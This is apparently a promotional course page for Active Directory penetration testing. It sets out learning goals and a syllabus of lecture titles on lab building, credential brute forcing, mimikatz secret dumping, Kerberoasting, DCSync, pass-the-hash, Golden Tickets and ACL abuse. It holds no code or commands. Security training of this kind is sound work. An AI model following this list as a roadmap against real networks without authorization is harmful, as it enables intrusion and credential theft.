Learn how to enumerate information from Active Directory, including users, groups, computers, and trust relationships. Understand the importance of information
Learn how to abuse some active directory intended functionality to established foothold and escalate privilege
Identify common attack vectors in Active Directory, such as misconfigurations, weak passwords, and insecure group memberships. Understand how attackers exploit
Understand the importance of reconnaissance in penetration testing. Learn to use tools for AD reconnaissance, such as BloodHound and PowerView.
Explore common vulnerabilities in Active Directory, such as pass-the-hash attacks, Kerberoasting, and DCSync attacks.
Understand post-exploitation activities, including lateral movement and privilege escalation.
Understand the concept of trusts in Active Directory and how they can be exploited
Learn about common trust-based attacks, such as Golden Ticket attacks.
Student will learn how to build active directory lab create forests and trust between forests
Understanding Windows Active Directory is an invaluable skill for security professionals for several compelling reasons
1 Critical Infrastructure: Active Directory is a critical component in most Windows-based networks, serving as the backbone for authentication, authorization, and resource management. Penetrating Active Directory can lead to unauthorized access to sensitive information, making it a prime target for attackers. Understanding how to test and secure it is essential for protecting overall network security.
2 Common Attack Vector: Active Directory is a common target for attackers attempting to compromise an organization’s network. Knowing how to conduct penetration testing allows security professionals to identify and address vulnerabilities before malicious actors can exploit them.
3 Risk Mitigation: By proactively testing Active Directory, security professionals can identify and mitigate potential risks and vulnerabilities. This proactive approach is essential for preventing security incidents and data breaches.
Get Instant Notification of New Courses on our
Telegram channel.
4 Career Advancement: For individuals pursuing a career in cybersecurity, having expertise in Active Directory penetration testing is a valuable skill. Employers often seek professionals who can assess and enhance the security of critical infrastructure components like Active Directory.
Red Team Operations: Active Directory penetration testing is a fundamental skill for red team operations. Red teams simulate real-world attacks to test an organization’s defenses, and a strong understanding of Active Directory is essential for effective red teaming.
In summary, learning Active Directory penetration testing is important for enhancing cybersecurity, preventing unauthorized access, meeting compliance requirements, and staying ahead of evolving cyber threats. It equips security professionals with the skills needed to protect critical IT infrastructure and respond effectively to security challenges.
Creating Active Directory Penetration Testing Lab
OverView
Creating VMs and Downloading Evaluation Copies of Windows Servers and Clients
Installing Windows Server 2019 as root Domain
Installing AD-DS on ROOT-DC01
Installing and Configuring Sql Server on ROOT-DC01
Installing and Configuring the Child Domain
Installing TRUSTED-DC03 for Forest Trust
Installing and Configuring Sql Server on TRUSTED-DC03
Installing and Configuring WIndows 10 Client Machine
Installing windows server 2016 as DMZ-SRV
Installing and Configuring Sql Server on DMZ-SRV
Installing Windows Server 2008 as File Server
Configuring Trust Relationship between Forests
Creating Domain Users
Creating Groups and GPO
Foreign Group Membership Configuration
Creating Mssql Server logins, Databases and login Impersonation
External Enumeration
Ports Scanning with Nmap
SMB null session enum with smbclient,smbmap nbtscan , rpcclient and Nmap
Bruteforcing Mssql Server with Nmap
Bruteforcing Mssql Server with hydra
Bruteforcing Mssql Server with Metasploit
Bruteforcing Mssql Server with Crackmapexec
Code Execution and Initial Enumeration
Code Execution with with Crackmapexec using Sql Server sa Credential
Uploading SharpView.exe to the DMZ Server using Cracmapexec
Domain Enumeration with Sharpview.exe
Getting Foothold Using Crackmapexec with Mssql Credential
Getting Foothold Using Impacket with Mssql Credential
Post Exploitation
Dumping System Secrets with mimikatz
Port forwarding with netsh windows native tool
Pivoting with chisel and proxychains
Internal Domain Enumeration with PowerView Python
Domain Users Enumeration with PowerView Python
Domain Groups Enumeration with PowerView Python
Domain Computers Enumeration with PowerView Python
Forest trust enumeration with PowerView Python
Internal Domain enumeration with CrackMapExec
Domain Users, Groups, Computers and Shares Enumeration with CrackMapExec
Domain Enumeration with Windapsearch
Domain Users, Groups and Computer enumeration with Windapsearch
Domain Enumeration with rpcclient
Domain Users, Groups and Computers Enumeration with rcpclient
Domain Enumeration with BloodHound
Domain Enumeration with Bloodhound
Domain Privilege Escalation
ASREProasting with impacket
Kerberoasting with impacket
ASREProasting with CrackMapExec
Kerberoasting with CrackMapExec
DCSync with CracMapExec and Impacket
Computer Unconstrained delegation
Computer Unconstrained Delegation – Printer Bug
Computer Constrained Delegation with impacket
Resource-Based Constrained Delegation with impacket
Link-local multicast name resolution (LLMNR Poisoning) exploiting with responder
Domain PrivEsc – Mssql server-CrackMapExec
Exploiting SQL Impersonation from public role to sysadmin role with CrackMapexec
Little about CrackMapExec Database
Domain PrivEsc – Mssql server – Impacket
Exploiting SQL Server Nested impersonation with Impacket
Pass the Hash Lateral Movement
Pass the hash (Pth) with CrackMapExec, Impacket, Evil-winrm and xfreerdp
Cross-Forest Trust Attack
Cross-Forest Trust AsReproasting
Cross-Forest Trust Kerberoasting
Foreign Group Membership Enumeration
Foreign Group Membership Attack
Cross-Forest Trust SQL Server Trustworthy Database Attack
Cross-Forest Privilege Escalation Trustworthy database, with PowerUPSQL
Attacking Domain Trusts – Child -> Parent Trusts
Domain Privilege Escalation from DA of Child Domain to EA domain with Powershell
Domain Privilege Escalation from DA of Child Domain to EA domain Impacket
Active Directory Persistence
Golden Ticket with Impacket
Silver Ticket with Impacket
AdminSDHolder Overview
ACL Attack > ForceChangePassword
ACL Attack > GenericWrite
AdminSDHolder ACL Attack
